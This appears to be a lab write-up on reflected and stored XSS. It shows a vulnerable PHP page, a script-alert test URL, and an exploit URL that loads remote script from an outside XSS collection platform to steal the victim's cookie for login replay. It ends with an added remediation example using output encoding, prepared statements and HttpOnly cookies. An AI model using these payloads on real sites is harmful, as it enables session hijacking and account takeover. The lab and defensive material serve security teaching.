1. (1) Reflected XSS page source:
<?php
require_once "../../common/common.php";
// Not logged in: redirect to the login page. The original omitted exit, so the
// rest of the script (including the flag cookie below) still ran for
// unauthenticated requests.
if (!isset($_SESSION['user'])) {
    header("Location: ../login.php");
    exit;
}
// Clear any flag cookie left over from an earlier attempt.
setcookie("flag", "", time() - 1);
// The id parameter is reflected into xss_1.html by the template; if it
// contains the string "alert", the environment's flag is issued as a cookie.
if (isset($_GET["id"]) && !empty($_GET["id"])) {
    if (strstr($_GET['id'], 'alert')) {
        $sql = "SELECT * FROM env_list WHERE id = 9";
        $res = $dbConnect->query($sql);
        $row = mysqli_fetch_assoc($res);
        setcookie("flag", $row['envFlag']);
    }
}
// TPMELATE is the template-directory constant defined in common.php.
require_once TPMELATE . "/xss_1.html";
?>
(2) XSS test:
http://192.168.153.128/control/xss/xss_1.php?id=1%3Cscript%3Ealert%281%29%3C/script%3E
(3) XSS platform configuration (the platform I used: https://xsshs.cn)
(4) Exploiting the XSS:
192.168.153.128/control/xss/xss_1.php?id=1<sCRiPt sRC=https://xsshs.cn/wPGg></sCrIpT>
(5) The cookie can be retrieved from the platform and used directly to log in:
2. Stored XSS:
After submission the payload is stored in the database automatically and executes as soon as the page is visited.
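How both pages could be fixed, as an added example that is not the lab's own code: it covers the reflected id handler above and the stored-comment case in one script. The id and the stored body are HTML-encoded on output with htmlspecialchars, the stored value is written with a prepared statement, and the flag cookie is set HttpOnly so a script that does manage to run cannot read it from document.cookie, which is what the cookie-theft step relies on. The table name comments, the in-memory SQLite database via PDO (needs the pdo_sqlite extension), the options-array form of setcookie (PHP 7.3+) and the test string are assumptions constructed for the example; the lab's real template and database layout are not shown on the page.

```php
<?php
// Added example, not the lab's code. Assumed: table "comments", PDO over an
// in-memory SQLite database, PHP >= 7.3 for the setcookie options array.
declare(strict_types=1);

// Encode untrusted text for an HTML text or attribute context.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Reflected case: the id parameter is still echoed, but encoded, so a value
// like 1<script>alert(1)</script> is rendered as text rather than executed.
function renderReflected(string $id): string
{
    return '<p>Result for id ' . h($id) . '</p>';
}

// Stored case, write side: a prepared statement keeps the body out of the SQL.
function storeComment(PDO $db, string $body): void
{
    $stmt = $db->prepare('INSERT INTO comments (body) VALUES (:body)');
    $stmt->execute([':body' => $body]);
}

// Stored case, read side: encode at the point of output, never trust the
// stored value just because it came from our own database.
function renderComments(PDO $db): string
{
    $items = '';
    foreach ($db->query('SELECT body FROM comments ORDER BY id') as $row) {
        $items .= '<li>' . h($row['body']) . '</li>';
    }
    return '<ul>' . $items . '</ul>';
}

// The flag cookie is the asset the payload steals. HttpOnly removes it from
// document.cookie; SameSite=Strict limits cross-site replay of the session.
function setFlagCookie(string $flag): void
{
    setcookie('flag', $flag, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

// Demonstration on constructed input (the test string from the page, decoded).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT NOT NULL)');

$payload = '1<script>alert(1)</script>'; // constructed test value
storeComment($db, $payload);

setFlagCookie('FLAG_PLACEHOLDER'); // placeholder; set before any output

echo renderReflected($payload), PHP_EOL;
echo renderComments($db), PHP_EOL;
```

Run with the php CLI; both lines print the payload with `<` and `>` replaced by entities, and the stored copy in the table is the raw string, which is correct: encoding belongs at output time, once per context.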